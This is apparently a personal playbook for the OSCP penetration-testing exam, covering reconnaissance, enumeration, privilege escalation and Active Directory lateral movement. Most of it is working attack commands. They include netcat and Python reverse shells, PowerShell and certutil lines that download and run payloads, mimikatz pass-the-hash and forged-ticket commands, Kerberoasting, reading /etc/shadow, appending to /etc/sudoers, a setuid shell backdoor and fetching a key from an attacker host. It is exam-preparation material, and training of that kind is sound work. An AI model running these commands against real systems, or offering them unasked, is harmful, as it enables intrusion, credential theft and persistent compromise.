OSCP Exam Playbook

Get on the exam 15 minutes in advance to get screen share and VPN setup.

Start exam, make exam directories, write down IPs on paper. Two of the differing IPs are likely internal IP's for AD network. Ignore these for now.

Turn on Responder just in case we can pull a random hash from thin air while we work. Get Neo4j console and Bloodhound and Caido going as well to make sure they are working before we start.

#AutoRecon - Start with autorecon with a targets.txt file to easily make
#all my directories easily. You can pick the IP/IPs I will start scanning manually and
#let autorecon run in the background for the rest of the IPs

Scan each host separately and output results to its own directory with -On. Scan with nmap after for UDP ports and common vulnerabilities.

# Take the time to do these scans correctly. A missed port can be the 
# difference. Don't scan multiple hosts at once. It can cause ports to be
# missed.

#Most Used
rustscan -a <IP> -- -A -sC -Pn -T4 -On rustscan.txt --script=(\"'vuln'\")
sudo nmap <IP> --top-ports=5000 -sS -A -sC -T4 -Pn -On nmapscan.txt
sudo nmap <IP> --top-ports=5000 -sU -A -sC -T4 -Pn -On UDPscan.txt
sudo nmap <IP> -p --script=vuln -T4 -Pn -On vulnscan.txt

#Everything Else
rustscan -a <IP>    #Hits all the ports wicked fast. Use this first as a first pass
sudo nmap --top-ports=1000 -Pn -T4 <IP> #Hits the top 1000 ports #Hits the top 1000 ports
sudo nmap -p- -Pn -T4 <IP>    #Hits every port with syn/ack requests
sudo nmap -p- -sT -Pn -T4 <IP>    #Hits every port with syn requests
sudo nmap -p- -sU -Pn -T4 <IP>    #Hits every port with udp requests
sudo nmap -sT -sC -A -Pn -T4 -script vuln <IP> -p <PORTS> #Hits the found ports with all the goods
sudo nmap -script='<PROTOCOL>-vuln*.nse' <IP> -p <PORT> #Hits a specific service with vuln scripts

Note all of the notable ports and services and versions on paper.

MAKE SURE TO ADD IPs AND MATCHING DOMAIN NAMES TO /etc/hosts

Look for the initial Windows (AD) host and start there. Scan other hosts after scanning Windows target while researching a vulnerability. Save a lot of time here.

Find initial entry:

Tools to enumerate:

dig,dnsrecon,dnsenum
gobuster - dir,vhost,dns,FUZZ
enum4linux
nikto
crackmapexec
BurpSuite
hydra
beef-xss
minitrue
searchsploit
exploitdb
hacktricks
google

DNS zone transfer

dig any victim.com @<DNS_IP>

dig axfr domain.com @<DNS_IP>

dnsrecon -d megacorpone.com -D ~/list.txt -t brt

Web Enumeration

***If you run out of options and can't find anything, try .log, .py, .txt, .zip for some potential saved creds

Try a different wordlist as well. dirb/big.txt is a good start***

ferox="feroxbuster --redirects --depth 3 --wordlist=/usr/share/wordlists/dirb/big.txt --collect-extensions --collect-words --extensions php,js,txt,zip,py,log --filter-status 404 --output ferox_scan.txt --url"
feroxbig="feroxbuster --redirects --depth 3 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --collect-extensions --collect-words --extensions php,js,txt,asp,aspx,zip,py,log --filter-status 404 --output ferox_scan.txt --url"

gosmall="gobuster dir -t 50 --wordlist=/usr/share/wordlists/dirb/common.txt -u"
gobig="gobuster dir -t 50 --wordlist=/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u"

gobuster dir -u http://<IP>:port -w <WORDLIST>     #Directory Scan
gobuster dir -u http://<IP>:port -w <WORDLIST> -d     #Backup files
gobuster dir -u http://<IP>:port -w <WORDLIST> -x <EXTENSIONS>     #Searches for Extensions
gobuster dir -u http://<IP>:port -w <WORDLIST> -k    #Ignore ssl cert

gobuster fuzz -t 50 -u https://example.com?FUZZ=test -w parameter-names.txt

nikto -host <IP> -port <PORT>     #Web Server Enumeration
whatweb <IP>:<PORT> -vv     #Grabs Technology Stack

hydra -l <USER> -P <PASS FILE> <IP> -s <PORT> -V http-post-form '<URI>:<POST REQUEST>:<ERROR RESPONSE>'     #Brute Force http post form

#CHECK SOURCE CODE
#ADD IP TO /ETC/HOSTS IF NEEDED
Brute Force
hydra -l <USER> -P <PASS FILE> <IP> -s <PORT> -V http-post-form '<URI>:<POST REQUEST>:<ERROR RESPONSE>'     #Brute Force http post form
hydra -l <USER> -P <PASS FILE> -s <PORT> <PROTOCOL>://<IP> -v    #Brute Force Protocol

godns="gobuster dns -t 50 --wordlist=/usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -d"

dns Mode

Options

Uses DNS subdomain enumeration mode

Usage:
  gobuster dns [flags]

Flags:
  -d, --domain string      The target domain
  -h, --help               help for dns
  -r, --resolver string    Use custom DNS server (format server.com or server.com:port)
  -c, --show-cname         Show CNAME records (cannot be used with '-i' option)
  -i, --show-ips           Show IP addresses
      --timeout duration   DNS resolver timeout (default 1s)
      --wildcard           Force continued operation when wildcard found

Global Flags:
      --delay duration    Time each thread waits between requests (e.g. 1500ms)
      --no-color          Disable color output
      --no-error          Don't display errors
  -z, --no-progress       Don't display progress
  -o, --output string     Output file to write results to (defaults to stdout)
  -p, --pattern string    File containing replacement patterns
  -q, --quiet             Don't print the banner and other noise
  -t, --threads int       Number of concurrent threads (default 10)
  -v, --verbose           Verbose output (errors)
  -w, --wordlist string   Path to the wordlist
Examples

gobuster dns -d mysite.com -t 50 -w common-names.txt
Normal sample run goes like this:

gobuster dns -d google.com -w ~/wordlists/subdomains.txt

===============================================================
Gobuster v3.2.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Mode         : dns
[+] Url/Domain   : google.com
[+] Threads      : 10
[+] Wordlist     : /home/oj/wordlists/subdomains.txt
===============================================================
2019/06/21 11:54:20 Starting gobuster
===============================================================
Found: chrome.google.com
Found: ns1.google.com
Found: admin.google.com
Found: www.google.com
Found: m.google.com
Found: support.google.com
Found: translate.google.com
Found: cse.google.com
Found: news.google.com
Found: music.google.com
Found: mail.google.com
Found: store.google.com
Found: mobile.google.com
Found: search.google.com
Found: wap.google.com
Found: directory.google.com
Found: local.google.com
Found: blog.google.com
===============================================================
2019/06/21 11:54:20 Finished
===============================================================

gosub="gobuster vhost -t 50 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain -u"

vhost Mode

Options

Uses VHOST enumeration mode (you most probably want to use the IP address as the URL parameter)

Usage:
  gobuster vhost [flags]

Flags:
      --append-domain         Append main domain from URL to words from wordlist. Otherwise the fully qualified domains need to be specified in the wordlist.
  -c, --cookies string        Cookies to use for the requests
      --domain string         the domain to append when using an IP address as URL. If left empty and you specify a domain based URL the hostname from the URL is extracted
      --exclude-length ints   exclude the following content length (completely ignores the status). Supply multiple times to exclude multiple sizes.
  -r, --follow-redirect       Follow redirects
  -H, --headers stringArray   Specify HTTP headers, -H 'Header1: val1' -H 'Header2: val2'
  -h, --help                  help for vhost
  -m, --method string         Use the following HTTP method (default "GET")
  -k, --no-tls-validation     Skip TLS certificate verification
  -P, --password string       Password for Basic Auth
      --proxy string          Proxy to use for requests [http(s)://host:port]
      --random-agent          Use a random User-Agent string
      --retry                 Should retry on request timeout
      --retry-attempts int    Times to retry on request timeout (default 3)
      --timeout duration      HTTP Timeout (default 10s)
  -u, --url string            The target URL
  -a, --useragent string      Set the User-Agent string (default "gobuster/3.2.0")
  -U, --username string       Username for Basic Auth

Global Flags:
      --delay duration    Time each thread waits between requests (e.g. 1500ms)
      --no-color          Disable color output
      --no-error          Don't display errors
  -z, --no-progress       Don't display progress
  -o, --output string     Output file to write results to (defaults to stdout)
  -p, --pattern string    File containing replacement patterns
  -q, --quiet             Don't print the banner and other noise
  -t, --threads int       Number of concurrent threads (default 10)
  -v, --verbose           Verbose output (errors)
  -w, --wordlist string   Path to the wordlist
Examples

gobuster vhost -u https://mysite.com -w common-vhosts.txt

wfuzz -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 400,404,500 http://x.x.x.x/FUZZ
wfuzz -w /usr/share/seclists/Discovery/Web_Content/quickhits.txt --hc 400,404,500 http://x.x.x.x/FUZZ

Wordpress

# Enumerate vulnerable plugins and themes, timthumbs, wp-config.php backups, database exports, usernames and media IDs
wpscan --url $url --no-update --disable-tls-checks -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee tcp_port_protocol_wpscan.txt

# Enumerate all plugins
wpscan --url $url --disable-tls-checks --no-update -e ap --plugins-detection aggressive -f cli-no-color 2>&1 | tee tcp_port_protocol_wpscan_plugins.txt

#Brute-force usernames/password combos
wpscan --url http://192.168.221.121/wordpress --usernames 'loly' --passwords /rockyou.txt

Robots.txt

/robots.txt

Only get HTTP headers

curl -I $url

Cewl

cewl $url/index.php -m 3 --with-numbers -w cewl.txt

Drupal

python3 drupwn --version 7.28 --mode enum --target $url

droopescan scan drupal -u $url

Shellshock

# Check if bash vulnerable to CVE-2014-6271 (bash vulnerable if ‘vulnerable’ in output)
env x='() { :;}; echo vulnerable' bash -c "echo this is a test" 

# Brute force CGI files
gobuster dir -u $url/cgi-bin/ -w /usr/share/seclists/Discovery/Web-Content/common.txt -x "cgi,sh,pl,py" -s "200,204,301,302,307,403,500" -t 16 -o "tcp_port_protocol_gobuster_shellshock.txt"

wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/CGIs.txt --hc 404 -t 16 $url/cgi-bin/FUZZ 2>&1 | tee "tcp_port_protocol_wfuzz.txt"

Webmin uses cgi files - versions up to 1.700 vulnerable to shellshock (http://www.webmin.com/security.html)

Samba (SMB)

#Unauthenticated Stuff
crackmapexec smb <IP>
crackmapexec smb <IP> -u '' -p ''
crackmapexec smb <IP> -u 'a' -p ''
crackmapexec smb <IP> -u 'user' -p 'password' -M zerologon
crackmapexec smb <IP> -u 'user' -p 'password' -M petitpotam

#Authenticated Stuff
crackmapexec smb <IP> -u 'user' -p 'password' --users
crackmapexec smb <IP> -u 'user' -p 'password' --shares
crackmapexec smb <IP> -u 'user' -p 'password' --sam/--lsa/--ntds(vss)/-M lsassy
crackmapexec smb <IP> -u 'user' -p 'password' -M spider_plus
crackmapexec smb <IP> -u 'user' -p 'password' -M spider_plus -o READ_ONLY=false
crackmapexec smb <IP> -u 'user' -p 'password' -M nopac

#Enum4Linux for all samba and Windows targets
enum4linux -s -v <IP>

smbclient -L x.x.x.x
smbclient -L x.x.x.x -U <user>
smbclient \\\\x.x.x.x\\share
smbclient \\\\x.x.x.x\\share -U <user>

nmap --script=smb-check-vulns.nse x.x.x.x

smbmount //x.x.x.x/share /mnt –o username=hodor,workgroup=hodor

NFS

showmount -e x.x.x.x
mount -t cifs //x.x.x.x/share /mnt

mount -t cifs -o username=hodor,password=hodor //x.x.x.x/share /mnt

SNMP

Scan using the default community string:

# Enumerate entire MIB tree
snmpwalk -c public -v1 -t 10 $ip

# Enumerate Windows users
snmpwalk -c public -v1 $ip 1.3.6.1.4.1.77.1.2.25

# Enumerate running Windows processes
snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.4.2.1.2

# Enumerate open TCP ports
snmpwalk -c public -v1 $ip 1.3.6.1.2.1.6.13.1.3

# Enumerate installed software
snmpwalk -c public -v1 $ip 1.3.6.1.2.1.25.6.3.1.2

Brute force community strings

onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings-onesixtyone.txt $ip 2>&1 | tee "udp_161_snmp_onesixtyone.txt"

RPC (111/tcp, 135/tcp)

msrpc/rpcbind

# Version detection + NSE scripts
nmap -Pn -sV -p $port --script=banner,msrpc-enum,rpc-grind,rpcinfo -oN tcp_port_rpc_nmap.txt $ip

rpcinfo

# List all registered RPC programs
rpcinfo -p $ip

# Provide compact results
rpcinfo -s $ip

Null session

rpcclient -U "" -N $ip
    srvinfo
    enumdomusers
    getdompwinfo
    querydominfo
    netshareenum
    netshareenumall

ident (113/tcp)

Enumerate users services running as

ident-user-enum $ip 22 25 80 445

NTP (123/udp)

# Run ntp-info NSE script
sudo nmap -sU -p 123 --script ntp-info $ip

NetBIOS-NS (137/udp)

enum4linux

enum4linux -a -M -l -d $ip 2>&1 | tee "enum4linux.txt"

nbtscan

nbtscan -rvh $ip 2>&1 | tee "nbtscan.txt"

Windows

After Initial Entry

After initial entry, look for privilege escalation right away. Test with basic enumeration commands first to find the obvious privilege escalation and to get an understanding of the box. This page has great info: https://infosecwriteups.com/privilege-escalation-in-windows-380bee3a2842

systeminfo
ipconfig /all
netstat -ano
whoami /all
net user
net localgroup administrators
klist

# Cached Creds
cmdkey /list
runas /savecred /user:<domain>\<user> "c:\windows\system32\cmd.exe /c C:\temp\nc.exe -nv <IP> <port> -e cmd.exe"
ex. runas /savecred /user:ACCESS\Administrator "c:\windows\system32\cmd.exe /c \IP\share\nc.exe -nv 10.10.14.2 80 -e cmd.exe"

# Unquoted service paths:
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

# Scheduled tasks and tasks linked to services:
schtasks /query /fo LIST /v
tasklist /SVC

Move over tools with either pysrv, smbsrv, ssh, or rdp:

File Transfers

#smbsrv
net use \\<IP>\smb
copy \\<IP>\smb\<file>
copy <file> \\<IP>\smb\

#pysrv
copy through browser
powershell.exe Invoke-WebRequest -Uri "http://<IP>/<file>" -Outfile "C:\temp\<file>"
powershell.exe -exec Bypass -C "IEX(New-Object Net.WebClient).DownloadString('<IP>/file');"

#remote desktop
If connecting between windows clients, you can share entire directories between machine
using the remote desktop application GUI

#winrm
Use evil-winrm upload/download files if port 5985 is open

#certutil
certutil.exe -urlcache -split -f http://10.0.0.5/40564.exe bad.exe

mimikatz
lazagne
adPEAS.ps1
winPEAS.bat
Invoke-Kerberoast.ps1
PowerUp.ps1
Seatbelt

ClearText Password - Find a cleartext password in registry somewhere from winPEAS or lazagne?

$secpasswd = ConvertTo-SecureString "password321" -AsPlainText -Force
$mycreds = New-Object System.Management.Automation.PSCredential ("john", $secpasswd)
$computer = "GHOST"
[System.Diagnostics.Process]::Start("C:\users\public\nc.exe","192.168.0.114 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)

Mimikatz or ps1 script to dump tickets to file:

kerberos::list /export

powershell -ep bypass
Import-Module .\Invoke-Mimikatz.ps1
Invoke-Mimikatz -Command '"kerberos::list /export"'

powershell -ep bypass
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat|Select-Object -ExpandProperty hash|out-file -Encoding ASCII hash.txt

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('<IP>/Invoke-Kerberoast.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerberoast.txt"

# kirbi2john and hashcat to crack tickets:

kirbi2john <ticket>.ticket
hashcat -m 13100

Lazagne to look for NTLM hashes/mscache hashes/saved creds/etc...

lazagne.exe all

adPEAS for AD enumeration and Sharphound extraction for Bloodhound

powershell -ep bypass
Import-Module .\adPEAS.ps1
Invoke-adPEAS

winPEAS for more obvious privilege escalation routes like unquoted service paths/UAC Bypass/ insecure file permissions/kernel exploits

winPEAS.bat  #Use full path if in powershell

PowerUp for more difficult privilege escalation techniques that can be automated like DLL hijacking.

powershell -ep bypass
Import-Module .\PowerUp.ps1
Invoke-AllChecks

# Look for abuse functions to exploit
# Start/stop services in cmd.exe and use abuse functions in powershell

sc <start/stop/restart> <serviceName>

# If only local admin and need SYSTEM, use PsExec (10.11.1.75) or PrintSpoofer

Seatbelt for thorough enumeration of lots of system info. Good info here if stuck.

Seatbelt.exe -group:all -full

If able to compile a list of domain users, test for validity with kerberos authentication or SMB authentication.

kerbrute userenum -d <domainName> <userNameList>
crackmapexec smb <IP> -u <userName/usernameList> -p <password/passwordList>

If password policy allows, use kerbrute to bruteforce passwords for domain users.

kerbrute bruteuser -d <domainName> <passwordList> <username>

After privilege escalation, look for lateral movement. Need a user hash, user credentials, service ticket. Use lazagne, mimikatz, seatbelt for dumps.

Port Scan - Start with a simple port scan of connected hosts

ipconfig /all
netstat -ano

# Use netcatportscanner and nc.exe to do a targetted port scan of the target

Remote Desktop - Look for users that can RDP if possible. Check bloodhound for a graphical view of the Active Directory domain.

net user /domain
dsquery user -limit 0 | dsget user -samid -sid -memberof -desc -email -fn -ln -disabled

# Enable RDP remotely with PsExec and if the user has the ability to RDP
# Refer to this article for multiple methods --->https://www.msnoob.com/enable-remote-desktop-remotely.html
PsExec.exe /accepteula \\<RemoteName or IP> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
PsExec.exe /accepteula \\<RemoteName or IP> netsh advfirewall set rule group="remote desktop" new enable=Yes

SSH - Use ssh to open a pivot if possible/needed

# Start ssh on kali
service ssh start

# Using PLINK.exe to open a remote port forward of a single port to scan with nmap
cmd.exe /c echo y | plink.exe -ssh -l jason -pw <kaliPassword> -N -R <kaliLocalIP>:<kaliLocalListenPort>:127.0.0.1:<targetPort> <kaliLocalIP>
# make the local listening port the same as the target port. better chance of getting through firewall. 
# Or use a really high port

# Using netsh (Windows Built-In ssh protocol)
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<localWinIP> localport=<portToListenOn>
netsh interface portproxy add v4tov4 listenport=<portToListenOn> listenaddress=<localWinIP> connectport=<portOfInterest> connectaddress=<internalIPOfInterest>

# Then, nmap the compromised Windows host on the listening port

# If ssh is disabled at the firewall, use HTTP Tunneling. See OSCP notes for setup

Pass The Hash - If I have an NTLM hash of a user, I can try to pass the hash or overpass the hash.

mimikatz
privilege::debug
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash>

pth-smbclient -U <domain>/<user>%<fullNTLM> //<IP>/c$

PsExec.exe \\<hostName or IP> -u <domain>\<username> -p <password> cmd.exe

evil-winrm -i <IP> -u <user> [-p <password> -H <hash>]

OverPass The Hash - If I have an NTLM hash but need to authenticate with a kerberos ticket using PsExec.

# Turn NTLM hash into Kerberos TGT ticket to authenticate with PsExec
mimikatz
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<hash> /run:PowerShell.exe
ex. sekurlsa::pth /user:jeff_admin /domain:corp.com /ntlm:e2b475c11da2a0748290d87aa966c327 /run:PowerShell.exe
net use \\dc01
klist
.\PsExec.exe \\dc01 cmd.exe

Pass The Ticket (silver ticket) - Need NTLM hash of a Machine/Service account.

mimikatz
privilege::debug
kerberos::golden /user:<user> /domain:<domain> /sid:<SID> /target:<attackedService> /service:<service> /rc4:<hash> /ptt
ex. kerberos::golden /user:offsec /domain:corp.com /sid:S-1-5-21-1602875587-2787523311-2599479668 /target:CorpWebServer.corp.com /service:HTTP /rc4:E2B475C11DA2A0748290D87AA966C327 /ptt
# We can easily obtain the SID of our current user with the whoami /user 
# command and then extract the domain SID part from it. Let's try to do 
# this on our Windows 10 client:
C:\>whoami /user

USER INFORMATION
----------------

User Name   SID
=========== ==============================================
corp\offsec S-1-5-21-1602875587-2787523311-2599479668-1103

The SID defining the domain is the entire string except the RID at the 
# end ( -1103 )

# Convert a password to NTLM hash
python -c 'import hashlib,binascii; print binascii.hexlify(hashlib.new("md4", "<password>".encode("utf-16le")).digest())'

Other ways to get at domain creds/hashes (https://www.tarlogic.com/blog/how-to-attack-kerberos/):

# Kerberoasting
Impacket-GetUserSPNs -dc-ip <ip_target_machine> <domain>/<user>

# ASREPRoasting
Impacket-GetNPUsers -no-pass -dc-ip <ip_target_machine> <domain>/<user> [-usersfile <users.txt>] -format hashcat

# LDAP Dump
ldapdomaindump <IP> -u '<domain>\<user>' -p <password>

#Kerberoasting
cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
hashcat -m13100 output.txt wordlist.txt

#ASREPRoasting
cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
hashcat -m18200 output.txt wordlist

#Bloodhound Ingestor
crackmapexec ldap <ip> -u user -p pass --bloodhound --ns ip --collection All

Linux

After Inital Entry

Resources

#Shell Escapes
https://fireshellsecurity.team/restricted-linux-shell-escaping-techniques/
https://marc.info/?l=full-disclosure&m=128776663124692&w=2

Recon and Enumeration

# Look for strange process
ps aux
pspy64

# Look for setuid programs (everyone can run them as root)
find / -perm -4000
# Example, if perl
perl -e ‘$ENV{PATH}="/usr/bin";system("whoami");’ → root

# List processes running as root, permissions and NFS exports
echo 'services running as root'; ps aux | grep root;  echo 'permissions'; ps aux | awk '{print $11}'|xargs -r ls -la 2>/dev/null |awk '!x[$0]++'; echo 'nfs info'; ls -la /etc/exports 2>/dev/null; cat /etc/exports 2>/dev/null

# Get a TTY shell after a reverse shell connection
python -c 'import pty;pty.spawn("/bin/bash")'

# Set PATH TERM and SHELL if they're missing
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
export TERM=xterm
export SHELL=bash

Tricks

Public Keys / SSH

# Add public key to authorized keys
echo $(wget https://ATTACKER_IP/.ssh/id_rsa.pub) >> ~/.ssh/authorized_keys

# if RSA key is added for 127.0.0.1 you can switch users
ssh -i id_rsa [email protected]

Python sudoers

# Add an user to sudoers in python
#!/usr/bin/env python
import os
import sys
try:
        os.system('echo "username ALL=(ALL:ALL) ALL" >> /etc/sudoers')
except:
        sys.exit()

SSH update-motd

# When you login from SSH, welcome message etc are executed from /etc/update-motd.d
# Even if you connect in user, scripts are executed with root privileges

# If you can write here or in another folder in the PATH, you can force execution
# By redifining "date" or "uname" for example

# Example, if you can write to /usr/local/bin you can create a backdoored binary here
# If the folder is first in the PATH, the backdoored one will be executed first.

Escaping Shells

# Escaping lshell
echo FREEDOM! && cd () bash && cd

Path variable

# Create fake cat
echo "/bin/bash" > /tmp/cat
chmod 777 /tmp/cat
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

# Update PATH
export PATH=/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin

# Go to root
cd /root
/usr/sbin/cat .flag.txt

# listinfo through date binary
cd /tmp
echo "/bin/sh" > date
chmod 777 date
echo $PATH
export PATH=/tmp:$PATH
/usr/bin/listinfo

Chrootkit

# Chrootkit
chrootkit -V
# Then Google / MSF

Capabilities

# Capabilities
export PATH=/bin:/sbin:/usr/bin:/usr/sbin:$PATH
getcap -r / 2>/dev/null
# TAR can read all files, so you can create a tar with a wanted file and than extract it
tar -cvf shadow.tar "/etc/shadow"
tar -xvf shadow.tar
cat etc/shadow

Overcome limited shells

# Some payloads to overcome limited shells
ssh user@$ip nc $localip 4444 -e /bin/sh
python -c 'import pty; pty.spawn("/bin/sh")'
export TERM=linux

# Python
python -c 'import pty; pty.spawn("/bin/sh")'
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("$ip",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),   *$ 1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# Bash
echo os.system('/bin/bash')
/bin/sh -i
exec "/bin/sh";

# Perl
perl —e 'exec "/bin/sh";'

# /bin/dash is the only shell to keep the sticky bit, so if you run as root (included cron, or services running as root): 
install -mode 4755 /bin/dash /tmp/sh
# Then you will have a /tmp/sh that gives any user who calls it root !

PreviousAbout Me NextOSCP Exam Guide (official)

Last updated 1 year ago